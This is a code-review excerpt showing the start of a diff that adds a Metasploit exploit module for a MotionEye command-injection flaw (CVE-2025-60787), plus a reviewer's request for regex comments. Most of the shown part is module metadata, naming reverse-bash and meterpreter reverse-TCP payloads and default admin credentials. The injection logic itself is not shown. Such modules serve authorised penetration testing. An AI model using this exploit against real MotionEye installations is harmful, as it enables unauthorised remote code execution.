modules/exploits/multi/http/motioneye_auth_rce_cve_2025_60787.rb

```diff
@@ -0,0 +1,404 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote Code Execution Vulnerability in MotionEye (CVE-2025-60787)',
+        'Description' => %q{
+          MotionEye is vulnerable to OS Command Injection in configuration parameters such as image_file_name.
+          Unsanitized user input is written to Motion configuration files,
+          allowing remote authenticated attackers with admin access to achieve code execution when Motion is restarted.
+
+          This vulnerability affects MotionEye versions <= 0.43.1b4 are vulnerable.
+          Successful exploitation may result in the remote code execution under the privileges
+          of the web server, potentially exposing sensitive data or disrupting survey operations.
+
+          An attacker can execute arbitrary system commands in the context of the user running the web server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'prabhatverma47' # Vulnerability Discovery
+        ],
+        'References' => [
+          ['CVE', '2025-60787'],
+          ['URL', 'https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter']
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                # In the Docker container from the official repository, only curl is available
+                'FETCH_COMMAND' => 'CURL'
+              }
+              # Tested with cmd/unix/reverse_bash
+              # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'Payload' => {
+          'BadChars' => '&\\'
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-09-09',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to MotionEye', '/']),
+        OptString.new('USERNAME', [true, 'The username used to authenticate to MotionEye', 'admin']),
+        OptString.new('PASSWORD', [true, 'The password used to authenticate to MotionEye', ''])
+      ]
+    )
+  end
+
+  def clean_string(data)
+    signature_regex = %r{[^A-Za-z0-9/?_.=&{}\[\]":, -]}
```

Comment:
Would be good to add some comments to these functions. In particular whenever using a regex its always good to add some comments explaining what the regex is trying to do so that its easier to maintain these functions in the future if someone needs to adjust things